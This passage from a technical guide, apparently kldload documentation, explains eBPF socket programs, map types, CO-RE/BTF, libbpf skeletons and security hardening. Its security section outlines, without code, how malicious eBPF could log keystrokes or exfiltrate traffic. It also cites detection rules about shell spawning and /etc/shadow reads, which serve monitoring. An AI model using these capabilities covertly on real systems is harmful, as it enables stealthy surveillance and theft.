Cilium uses TC programs for all its pod-level policy enforcement. When a CiliumNetworkPolicy says "deny traffic from namespace X to namespace Y," that becomes a TC eBPF program attached to the pod's veth interface. The policy runs in the kernel on every packet — no userland, no context switch, no rule table walk. When you add a new policy, Cilium generates new eBPF bytecode, loads it, and atomically replaces the old program on the interface. The changeover is instantaneous and lossless — in-flight packets on the old program complete, new packets see the new program. No iptables flap, no conntrack flush, no packet loss window. This is what "kernel-native policy" means in practice.

8. Socket-Level eBPF — Application-Layer Interception

Socket-level eBPF programs operate at the socket layer — above the network stack but below the application. They can intercept socket operations, redirect data between sockets, and modify socket behavior without any changes to the application. The three relevant program types are sockops, sk_msg, and sk_lookup.

sockops — socket lifecycle events

Fires on socket state transitions: BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB (connection established), BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB (accepted connection established), BPF_SOCK_OPS_STATE_CB (any state change). Can call bpf_sock_ops_cb_flags_set() to request additional callbacks, and bpf_setsockopt() to configure socket options like TCP congestion control or buffer sizes.

// Cilium uses sockops to detect when two pods on the same node connect // On ACTIVE_ESTABLISHED: check if destination is a local socket // If yes: install sk_msg redirect — bypass the network stack

sk_msg — message-level redirection

Fires on every message sent through a socket that is enrolled in a BPF_MAP_TYPE_SOCKMAP or SOCKHASH. Can redirect the message to a different socket in the same map using bpf_msg_redirect_map(). The data goes directly from the sender's socket buffer to the receiver's socket buffer — zero copies, zero stack traversal.

// Normal same-node pod communication: // pod-A socket → veth → bridge → veth → pod-B socket // With sk_msg redirect: // pod-A socket → pod-B socket (direct kernel copy, no network stack)

sk_lookup — socket selection

Fires when the kernel looks up which socket should receive an incoming packet. The default behavior is to match destination IP and port. sk_lookup can override this — redirect to a different socket regardless of the destination port, implement wildcard listeners, or distribute traffic across multiple sockets. Used for transparent proxy implementations and advanced load balancing.

// Normal: incoming packet → look up socket by dst IP:port // sk_lookup override: route based on arbitrary logic // Use case: a proxy that handles all traffic to a VIP, regardless of port

The performance implication is significant. Normal pod-to-pod communication on the same node traverses: socket send buffer, TCP stack, veth pair (virtual Ethernet), bridge (with MAC lookup), routing table, conntrack, TCP stack again, socket receive buffer. With socket-level eBPF redirection, the path is: socket send buffer, kernel copy, socket receive buffer. The entire network stack is bypassed. Cilium's per-node measurements show 40–60% reduction in latency for same-node pod communication, and 2–3x throughput improvement for high-bandwidth workloads.

When two pods on the same node talk to each other, the packet normally goes through the veth pair, the bridge, the routing table, and conntrack. Socket-level eBPF short-circuits all of that — the packet goes directly from one socket to the other. Zero network stack traversal. This is how Cilium accelerates same-node pod communication. The key insight is that all this routing overhead exists because the kernel does not know both sockets are on the same machine — it processes the packet as if it might need to go anywhere. sockops lets Cilium tell the kernel "these two sockets are co-located; skip the routing." This is not a special optimization for containers. It is a general mechanism: any application that creates two sockets and wants to transfer data between them efficiently can use sockmap redirect. Memcached, Redis, Kafka, gRPC — all of these involve intra-host socket communication that could benefit from sk_msg redirection.

9. eBPF Maps Deep Dive

Maps are the data layer of eBPF. Every interesting eBPF application uses maps extensively — for state, for communication with userland, for configuration, for metrics. Choosing the right map type for your use case matters for performance and correctness.

BPF_MAP_TYPE_HASH

General-purpose hash map. O(1) average lookup. Key and value are fixed-size byte arrays. Supports concurrent access from multiple CPUs (with a spinlock per bucket). bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem. Good for: connection tracking, per-IP counters, blocklists with arbitrary keys.

// Key: source IP (u32) or 5-tuple struct // Value: counter struct, connection state, policy verdict // When to use: general key-value, key is not a small integer

BPF_MAP_TYPE_ARRAY

Fixed-size array indexed by u32. O(1) lookup by array index — slightly faster than hash for integer keys. Values are zero-initialized. Cannot delete entries. Good for: configuration (indexed by config enum), per-CPU statistics (use PERCPU_ARRAY for lock-free updates), global state with a small known key space.

// Key: u32 index (0 to max_entries-1) // Value: config value, counter, backend struct // When to use: small fixed key space, config tables, per-CPU stats

BPF_MAP_TYPE_LRU_HASH

LRU hash map — when the map is full, the least-recently-used entry is evicted. Bounded memory, self-managing. Essential for tracking ephemeral state (TCP connections, DNS queries) where you do not want to manage eviction yourself. Cilium uses LRU maps for its connection tracking tables.

// Like HASH but with automatic eviction when full // Perfect for: connection tables, rate limit state, session tracking // Size your max_entries for expected peak connections, not forever

BPF_MAP_TYPE_PERCPU_HASH / PERCPU_ARRAY

Per-CPU variants of hash and array. Each CPU core has its own copy of the value. eBPF programs access their CPU's copy without locks — zero contention. Userland reads all CPU copies and sums/aggregates them. Best for high-frequency counters (packet counts, byte counts) where lock contention on a shared counter would be the bottleneck.

// 8 CPUs → 8 independent counter copies // eBPF: no lock, direct memory write, maximum throughput // Userland: read all 8, sum them — slight overhead but trivial // Use this for any high-frequency counter

BPF_MAP_TYPE_RINGBUF

Ring buffer for streaming events from eBPF programs to userland. Replaces the older BPF_MAP_TYPE_PERF_EVENT_ARRAY (which required per-CPU buffers). Single ring buffer, shared across CPUs, with ordering guarantees. bpf_ringbuf_output() copies event data to the ring. Userland polls with epoll and reads events via ring_buffer__poll() (libbpf API). Low-overhead, high-throughput event streaming.

// eBPF: bpf_ringbuf_output(&rb, &event, sizeof(event), 0) // Userland: ring_buffer__poll(rb, 100) // 100ms timeout // Use for: audit events, security alerts, flow records, any event stream

BPF_MAP_TYPE_LPM_TRIE

Longest-prefix-match trie — the data structure used in IP routing tables. Key is a prefix (network address + prefix length). Lookup finds the most specific matching prefix. Perfect for: IP blocklists with CIDR ranges, routing policy tables, geo-blocking by prefix block.

// Insert: 192.168.0.0/16 → block=1 // Lookup: 192.168.1.5 → matches /16 → block=1 // Lookup: 10.0.0.1 → no match → block=0 // Use for any IP-prefix-based policy — faster than iterating all CIDRs

Reading maps from userland with bpftool

bpftool is the Swiss Army knife for eBPF inspection. It can list all loaded programs, dump map contents, show BTF type information, and pin/unpin maps to the BPF filesystem. You do not need source code to inspect a running Cilium or Falco installation — bpftool reads their maps directly.

bpftool prog list # show all loaded eBPF programs bpftool map list # show all maps bpftool map dump id 42 # dump all entries in map 42 bpftool map lookup id 42 key hex c0 a8 01 05 # lookup one key bpftool map pin id 42 /sys/fs/bpf/mymap # pin for later access

Concrete: rate limiter map

A per-IP rate limiter uses a hash map with a per-IP token bucket. The eBPF program checks the bucket on each packet, refills based on elapsed time (using bpf_ktime_get_ns()), and returns DROP or PASS. Userland can set per-IP rate limits by updating the map. No kernel module, no iptables hashlimit, no userland daemon in the packet path.

// Map: src_ip → { tokens, last_refill_ns } // On each packet: refill = (now - last_refill) * rate // tokens = min(tokens + refill, burst) // if tokens >= 1: tokens -= 1; return PASS // else: return DROP // Entire rate limiter: ~20 eBPF instructions per packet
Maps are the bridge between kernel speed and human readability. The eBPF program updates counters and state at wire speed — millions of operations per second, no syscalls, no context switches. Your monitoring dashboard reads the map from userland every second, aggregates the counters, and displays them. No packet copies, no pcap files, no log parsing, no ring buffer overflows at high traffic rates. The per-CPU map pattern is important: a single shared counter for packet counts would be a cache line that every CPU is fighting over. A per-CPU array means each CPU writes its own cache line — no contention at any packet rate. The userland aggregation cost is negligible. This pattern — per-CPU fast path, aggregated slow path — is how every high-performance eBPF counter should work.

10. Writing Production eBPF Programs

Early eBPF programs were tied to a specific kernel version. You compiled against kernel headers from one specific kernel build, and the program broke if the kernel was updated because internal struct layouts changed. CO-RE (Compile Once — Run Everywhere) changed this. Combined with BTF, CO-RE programs compile once and adapt themselves to whatever kernel they load on.

BTF — BPF Type Format

BTF is a compact binary format that encodes the type information (struct layouts, function signatures, enum values) of every kernel type. It is stored in /sys/kernel/btf/vmlinux on BTF-enabled kernels. Every kldload kernel has BTF enabled. When an eBPF program uses CO-RE relocations, the loader (libbpf) reads the kernel's BTF at load time and patches the program's field offsets to match the running kernel's actual struct layout. If a struct field moved between kernel versions, libbpf fixes it up before loading.

CO-RE in practice

Instead of task->mm->pgd (a brittle direct field access), a CO-RE program uses BPF_CORE_READ(task, mm, pgd). This macro generates a relocation record in the eBPF object. When libbpf loads the program, it looks up the mm and pgd field offsets in the running kernel's BTF and patches the field access to use the correct offset. The same binary runs on kernel 5.14, 6.0, 6.8 without recompilation.

// Non-portable (brittle): task->mm->pgd // compiled-in offset, breaks on kernel update // CO-RE (portable): BPF_CORE_READ(task, mm, pgd) // offset resolved at load time from BTF

vmlinux.h — the kernel header replacement

Normally you include <linux/sched.h> and 50 other kernel headers. With BTF, you can generate a single vmlinux.h that contains all kernel type definitions, extracted directly from the running kernel's BTF. This eliminates the kernel headers dependency entirely. Generate it with: bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h. Include it in your eBPF C program. Done.

// Old way: #include <linux/sched.h>, <linux/mm.h>, ... (many headers) // CO-RE way: #include "vmlinux.h" (single file, all types, from running kernel) bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

The skeleton pattern

libbpf provides a skeleton generator that makes it easy to load and manage eBPF programs from any language. The workflow: write the eBPF C program, compile it to an object file, generate a skeleton header with bpftool gen skeleton, include the skeleton in your Go/Rust/Python loader. The skeleton handles: loading the program, verifying it, attaching it to the right hook, exposing maps as typed objects, and cleaning up on exit.

# 1. Write your eBPF C program: counter.bpf.c
# 2. Compile to eBPF object:
clang -O2 -g -target bpf -D__TARGET_ARCH_x86 \
    -I/usr/include/$(uname -m)-linux-gnu \
    -c counter.bpf.c -o counter.bpf.o

# 3. Generate skeleton header:
bpftool gen skeleton counter.bpf.o > counter.skel.h

# 4. In your Go loader (using cilium/ebpf library):
# Or in your C loader:
#   struct counter_bpf *skel = counter_bpf__open_and_load();
#   counter_bpf__attach(skel);
#   // access maps: skel->maps.ip_counts
#   counter_bpf__destroy(skel);

For Go programs, the cilium/ebpf library provides the same skeleton pattern with a Go code generator. For Rust, aya is the idiomatic choice with native Rust eBPF programs and a Rust loader. For Python, libbcc provides a higher-level interface (used by all bcc tools).

Early eBPF programs were tied to a specific kernel version. If you shipped an eBPF binary and the user updated their kernel, the binary broke — field offsets changed, struct layouts shifted, new fields were added. CO-RE plus BTF changed that. You compile once, ship a binary, and libbpf adapts the program to whatever kernel it finds. kldload ships BTF-enabled kernels across all supported distros — CentOS Stream 9 (5.14+), Debian 13 (6.1+), Ubuntu 24.04 (6.8+). CO-RE programs work out of the box on any kldload target. This is the same foundation that Cilium and Falco use to ship a single binary that works across kernel versions. For anyone writing operational tooling in Go or Rust that needs kernel visibility — network monitoring, security auditing, performance profiling — the cilium/ebpf or aya libraries with CO-RE are the right foundation. You get kernel-speed instrumentation with the portability of a normal binary.

11. eBPF Security Considerations

eBPF is simultaneously the best security monitoring tool available for Linux and a meaningful attack surface if access is not controlled. Understanding both sides is essential.

What eBPF can see

An eBPF program with the right program type can observe everything that passes through the kernel: every syscall with its arguments and return values, every network packet with full payload access (at TC level), every file open, read, and write, every process exec with its argument list, every memory allocation, every inter-process signal. A malicious eBPF program could log every keystroke (intercept read() on terminal file descriptors), exfiltrate every network payload (TC program), or silently drop connections (XDP program). This is not hypothetical — rootkits built on eBPF exist and are used in the wild.

CAP_BPF and CAP_PERFMON

Linux 5.8 split the previous requirement for CAP_SYS_ADMIN to load eBPF programs into two finer-grained capabilities. CAP_BPF allows loading eBPF programs and creating maps. CAP_PERFMON allows attaching to performance events and tracepoints. Together, they allow running observability tools without full root — but either capability on a compromised process is still very powerful. On kldload, only root can load eBPF programs by default.

// Privileged eBPF (CAP_BPF + CAP_PERFMON): full tracing, networking // Unprivileged BPF: disabled on kldload (kernel.unprivileged_bpf_disabled=1) // Check: sysctl kernel.unprivileged_bpf_disabled (should be 1)

eBPF for security monitoring: Falco

Falco uses an eBPF probe (or kernel module) to capture syscall events and evaluate rules against them. The rules are things like: "a process in a container spawned a shell," "a process opened /etc/shadow," "a binary wrote to /usr/bin." The eBPF probe captures events at kernel speed; Falco evaluates rules in userland. The combination gives you real-time security alerting with minimal overhead.

// bpftrace one-liner equivalent of Falco's core behavior: bpftrace -e 'tracepoint:syscalls:sys_enter_execve /comm != "bash"/ { printf("EXEC: pid=%d comm=%s file=%s\n", pid, comm, str(args->filename)); }'

Tetragon — kernel-enforced security policy

Cilium project

Tetragon goes further than Falco: it can enforce policy in the kernel, not just observe it. A Tetragon TracingPolicy can attach a SIGKILL action to a specific syscall pattern — the eBPF program sends the signal before the syscall completes. No userland round-trip, no race condition. If a process tries to exec a binary outside an allowed set, the kernel kills it before it runs.

// Falco: observe event → userland rule → alert (100ms reaction time) // Tetragon: observe event → kernel policy → SIGKILL (microseconds) // The difference matters for exploits that complete in milliseconds

kldload default security posture

kldload sets kernel.unprivileged_bpf_disabled=1 — unprivileged users cannot load eBPF programs or create maps. bcc tools and bpftrace require root. eBPF programs loaded by Cilium run as root under the Cilium agent's service account. The BPF filesystem (/sys/fs/bpf/) is accessible to root only. These defaults mean an attacker who does not have root cannot deploy a stealthy eBPF rootkit.

sysctl kernel.unprivileged_bpf_disabled=1 # set at boot # Also verify: ls -la /sys/fs/bpf/ → owned by root, mode 700 # And: bpftool prog list requires root # And: bpftrace requires root
eBPF is both the best security monitoring tool and a potential security risk. A malicious eBPF program can log every keystroke, every network connection, every file access — in the kernel, invisible to userland tools like ps, netstat, and lsof. This is why CAP_BPF exists and why only root should load eBPF programs. On kldload, the default security posture is: only root loads eBPF, bcc and bpftrace require root, and unprivileged BPF is disabled. If you are running a multi-tenant system where untrusted code runs, verify these settings are enforced. The good news: if you are already using eBPF for security monitoring (Falco, Tetragon), you have visibility into any attempt to load additional eBPF programs — Tetragon can alert on bpf(BPF_PROG_LOAD) syscalls from unexpected processes. Fighting eBPF with eBPF, from a position of first-mover advantage.

12. The kldload eBPF Toolkit

kldload is the only Linux distribution that ships eBPF development tools, runtime libraries, and a BTF-enabled kernel as a unified pre-configured stack on a bootable ISO. The live environment and every installed target system (desktop and server profiles) include:

Component What it is Covered in
bcc-tools 80+ production-ready eBPF programs for networking, disk, CPU, memory Section 4
bpftrace One-liner eBPF tracing language — awk for the kernel Section 5
bpftool Low-level eBPF inspection — programs, maps, BTF, skeleton generation Sections 9, 10
kernel headers Required for compiling eBPF programs against kernel types Section 3
libbpf C library for loading eBPF programs, managing maps, CO-RE support Section 10
BTF support (/sys/kernel/btf/vmlinux) Enables CO-RE — compile-once eBPF programs that work across kernel versions Section 10
Kernel 5.14+ / 6.1+ All modern eBPF features: bounded loops, ring buffer, BTF, CO-RE, sockmap Section 3

The complete picture: a kldload server is an eBPF-native host. The kernel ships with BTF enabled, so CO-RE programs from Cilium, Falco, and Tetragon work out of the box. bcc-tools and bpftrace are installed, so any operational question can be answered from the command line in seconds. libbpf and kernel headers are installed, so you can write and compile new eBPF programs on the host without a separate development environment. bpftool is installed, so you can inspect any running eBPF program or map — whether it was loaded by Cilium, a bcc tool, or your own code — without source access.

eBPF changes the economics of kernel observability. Questions that previously required days of strace analysis, packet captures, and log correlation now take seconds — one bpftrace one-liner, one bcc tool invocation. Security monitoring that previously required expensive APM agents or kernel modules now runs as lightweight eBPF programs with sub-1% CPU overhead at production traffic rates. Network policy that previously required complex iptables rule management now lives in kernel-compiled eBPF programs that update atomically and perform at line rate. On kldload, all of this is available the moment the OS boots.

Related pages